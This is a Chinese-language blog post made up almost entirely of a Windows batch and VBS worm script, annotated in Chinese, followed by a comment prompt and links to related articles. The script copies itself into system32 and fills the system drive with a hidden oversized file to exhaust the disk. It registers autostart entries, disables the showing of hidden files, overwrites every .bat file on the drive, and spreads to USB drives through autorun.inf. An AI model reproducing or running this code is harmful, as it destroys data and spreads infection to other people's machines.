@echo off
if exsit %SystemDrive%\PAGEFILES.SYS goto end
copy %0 %windir%\system32\logon.bat ::複製自身
FOR /F "tokens=3*" %%i in ('dir /-c%SystemDrive%^|find "可用字節"') do fsutil file createnew %SystemDrive%\PAGEFILES.SYS %%i ::製造超大文件,轟炸硬盤
attrib +r +s +h %SystemDrive%\PAGEFILES.SYS ::隱藏文件
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KV2007 /t REG_SZ /d%windir%\system32\logon.vbs ::自動啓動1
set pat=「開始」菜單\程序\啓動 ::自動啓動2
reg delete HKLM\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /va /f ::不顯示隱藏文件
for /r %SystemDrive% %%i in (*.bat) do type %0>%%i ::感染
if exist %windir%\system32\logon.vbs goto end
+++++++++++++++++++++++++=VBS部分+++++++++++++++++++++++++++++++++++++++
echo on error resume next>%windir%\system32\logon.vbs
echo strComputer = ".">>%windir%\system32\logon.vbs
echo set fs=createobject("scripting.filesystemobject")>>%windir%\system32\logon.vbs
echo set WshShell = WScript.CreateObject("WScript.Shell")>>%windir%\system32\logon.vbs
echo Set objWMIService = GetObject("winmgmts:" _>>%windir%\system32\logon.vbs
echo ^& "{impersonationLevel=impersonate}!\\" ^& strComputer ^& "\root\cimv2")>>%windir%\system32\logon.vbs
echo Set colDisks = objWMIService.ExecQuery _>>%windir%\system32\logon.vbs
echo ("Select * from Win32_LogicalDisk")>>%windir%\system32\logon.vbs
::監視u盤
echo For i =1 to 9000000000>>%windir%\system32\logon.vbs
echo For Each objDisk in colDisks>>%windir%\system32\logon.vbs
echo Select Case objDisk.DriveType>>%windir%\system32\logon.vbs
echo :Case 2:>>%windir%\system32\logon.vbs
::判斷u盤中是否存在autorun.inf,不存在則寫入autorun.inf並且隱藏.
echo y1=fs.FileExists(objDisk.DeviceID ^&"\AUTORUN.INF")>>%windir%\system32\logon.vbs
echo if not y1 then>>%windir%\system32\logon.vbs
echo set f=fs.opentextfile(objDisk.DeviceID ^&"\AUTORUN.INF",2, true)>>%windir%\system32\logon.vbs
echo f.write "[AutoRun]" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.write "open=logon.bat" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.write "shellexecute=logon.bat" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.write "shell\Auto\command=logon.bat" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.Close>>%windir%\system32\logon.vbs
echo Set f1 = fs.GetFile(objDisk.DeviceID ^&"\AUTORUN.INF")>>%windir%\system32\logon.vbs
echo If f1.Attributes = f1.Attributes AND 2 Then>>%windir%\system32\logon.vbs
echo :f1.Attributes = f1.Attributes XOR 7:>>%windir%\system32\logon.vbs
echo End If>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs
::判斷u盤中是否存在logon.bat,如果不存在則寫入logon.bat並隱藏.
echo y2=fs.FileExists(objDisk.DeviceID ^&"\logon.bat")>>%windir%\system32\logon.vbs
echo if not y2 then >>%windir%\system32\logon.vbs
echo fs.CopyFile "c:\windows\system32\logon.bat",objDisk.DeviceID ^& "\">>%windir%\system32\logon.vbs
echo Set f2 = fs.GetFile(objDisk.DeviceID ^&"\logon.bat")>>%windir%\system32\logon.vbs
echo If f2.Attributes = f2.Attributes AND 2 Then>>%windir%\system32\logon.vbs
echo :f2.Attributes = f2.Attributes XOR 7:>>%windir%\system32\logon.vbs
echo End If>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs
echo dirr = Wshshell.ExpandEnvironmentStrings("%systemdrive%")>>%windir%\system32\logon.vbs
::判斷u盤中是否存在PAGEFILES.SYS,如果不存在則寫入PAGEFILES.SYS並隱藏.
echo y3=fs.FileExists(dirr &"\PAGEFILES.SYS")>>%windir%\system32\logon.vbs
echo if not y3 then>>%windir%\system32\logon.vbs
echo WshShell.Run"logon.bat">>%windir%\system32\logon.vbs
echo WScript.Sleep 500>>%windir%\system32\logon.vbs
echo Set f3 = fs.GetFile(dirr &"\PAGEFILES.SYS")>>%windir%\system32\logon.vbs
echo If f3.Attributes = f3.Attributes AND 2 Then>>%windir%\system32\logon.vbs
echo :f3.Attributes = f3.Attributes XOR 7:>>%windir%\system32\logon.vbs
echo End If>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs
echo End Select>>%windir%\system32\logon.vbs
echo Next>>%windir%\system32\logon.vbs
::每隔5秒掃描一次.
echo WScript.Sleep 5000>>%windir%\system32\logon.vbs
echo Next>>%windir%\system32\logon.vbs
::運行logon.vbs腳本程序
start %windir%\system32\logon.vbs
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
:end
系統崩潰批之處理
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
HOW TO:在圖形用戶介面中查看和轉移 FSMO 角色
lingping
2019-02-23 14:05:54
實現與 Outlook Web Access 的更改密碼功能
lingping
2019-02-23 14:05:54
如何將 .nk2 文件導入至 Outlook 2010
lingping
2019-02-23 14:05:54
誰說菜鳥不會數據分析(工具篇)出來啦
daoran123457
2019-02-23 13:48:41
Windows 2000 Active Directory FSMO 角色
lingping
2019-02-23 14:05:54
Windows 7 x64 with boot camp 4.0 - "unsupported model
lingping
2019-02-23 14:05:54
windows 2008 全新仲裁模式
qyh282110204
2019-02-23 14:05:36
調整Windows 7的DPI, 使文字閱讀更舒服【開始的搜索】
wwtwwttc
2019-02-23 14:05:24
系統慢、電腦性能變差自動診斷和修復
wwtwwttc
2019-02-23 14:05:23
Windows 7桌面背景幻燈片怎麼不動了
wwtwwttc
2019-02-23 14:05:21
iscsi存儲
samplelife
2019-02-23 13:57:35
Windows組策略屏蔽U盤有妙法(圖)
czq2008sky
2019-02-23 13:43:30
Windows PowerShell 批量遷移Windows用戶信息
781732825
2019-02-23 13:43:05
SQL 2008 R2安裝部署及端口開放
vip2008
2019-02-23 13:42:18
最好的後期閱讀應用
Lutherbrown95600
2020-07-28 02:29:32